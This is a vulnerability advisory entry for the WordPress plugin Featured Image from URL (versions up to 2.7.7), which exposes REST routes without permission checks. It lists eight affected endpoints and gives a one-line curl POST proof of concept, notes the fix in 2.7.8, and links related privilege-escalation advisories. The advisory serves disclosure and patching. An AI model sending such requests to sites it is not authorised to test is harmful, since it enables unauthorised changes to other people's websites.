Featured Image from URL <= 2.7.7 – Missing Access Controls on REST routes | Plugin Vulnerabilities

Description

The REST routes are missing permission callbacks, allowing unauthenticated/unauthorised users to call them.

Proof of Concept

Affected endpoints:
- wp-json/featured-image-from-url/v2/enable_fake_api
- wp-json/featured-image-from-url/v2/disable_fake_api
- wp-json/featured-image-from-url/v2/none_fake_api
- wp-json/featured-image-from-url/v2/data_clean_api
- wp-json/featured-image-from-url/v2/save_dimensions_all_api
- wp-json/featured-image-from-url/v2/clean_dimensions_all_api
- wp-json/featured-image-from-url/v2/disable_default_api
- wp-json/featured-image-from-url/v2/none_default_api


curl -X POST https://WP/wp-json/featured-image-from-url/v2/enable_fake_api

Affects Plugins

featured-image-from-url

Fixed in 2.7.8

References

URL

https://plugins.trac.wordpress.org/changeset?new=2217617%40featured-image-from-url&old=2216221%40featured-image-from-url

Classification

Type

PRIVESC

OWASP top 10

A2: Broken Authentication and Session Management

CWE

Miscellaneous

Verified

No

WPVDB ID

3b224d32-b0bf-4810-97fe-b8f0fb71c723

Timeline

Publicly Published

2019-12-24 (about 6 years ago)

Added

2019-12-24 (about 6 years ago)

Last Updated

2019-12-24 (about 6 years ago)

Other

Published

Title

Published

2025-01-13

Title

Homey <= 2.4.1 - Authenticated (Subscriber+) Privilege Escalation

Published

2026-05-01

Title

Import and export users and customers < 2.0.9 - Authenticated (Subscriber+) Privilege Escalation via Multisite Capability Meta Fields

Published

2024-10-18

Title

GERRYWORKS Post by Mail <= 1.0 - Contributor+ Privilege Escalation

Published

2020-10-29

Title

WordPress < 5.5.2 - XML-RPC Privilege Escalation

Published

2025-03-14

Title

uListing <= 2.1.7 - Subscriber+ Privilege Escalation